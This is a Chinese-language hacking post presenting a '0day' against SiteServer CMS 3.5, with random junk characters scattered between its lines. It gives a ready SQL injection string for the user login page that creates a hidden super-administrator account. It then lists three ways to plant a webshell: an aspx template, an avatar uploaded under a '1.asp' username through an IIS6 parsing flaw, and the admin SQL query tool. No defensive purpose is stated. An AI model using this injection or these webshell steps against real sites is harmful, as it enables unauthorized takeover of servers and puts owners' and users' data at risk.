SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
& [" _) s( O  n8 s
stieserver官网:www.siteserver.cn
: _" Z8 ]5 o# p3 u# y; e( D5 d1 s
5 y& U- @0 ~% d) @" v
- H: E5 d3 d% u5 u
  Z4 S0 ^0 Z$ v+ @/ G% w' O8 IEXP:

' l# |* m  q) H% F( {7 [! ~1 z直接访问UserCenter/login.aspx
1 D9 l, e4 f& Z

; O) M# ?) Z3 U. O, a
用户名处输入：

2 t4 A' A) ?6 K( d123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
% @. t5 L% G% [% s8 h2 G

( `) ?5 A. }; w
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
3 A/ w5 z3 y2 F9 i  d. ]$ l5 V+ {
8 C3 j# p+ ~% S) s" r- U8 R$ N3 x

之后再访问后台SiteServer/login.aspx用插入的用户登陆

" ^7 I# K$ e3 q8 O' w! r( Y( C* H
2 D8 E7 I/ v0 g& Z  ]
后台拿webshell的三种方法：

- W5 \% p5 e- P: ~. R5 W一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. I- X7 w6 H. }3 G" C. d
. r& g; U; H* K8 R$ r" E二、
( G  [: v( R- O2 V
. m# x  A7 u# e* W  T( z% k/ d成员权限-》添加用户-》用户名为：1.asp
. A7 O; T% w$ p2 f9 P6 S1 q( U
http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

; S, r0 z. O* g- ^' o三、
; G+ C; j# B! ^. {
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

1 j9 C: D/ b3 G5 s, Q) E' O* u" I系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。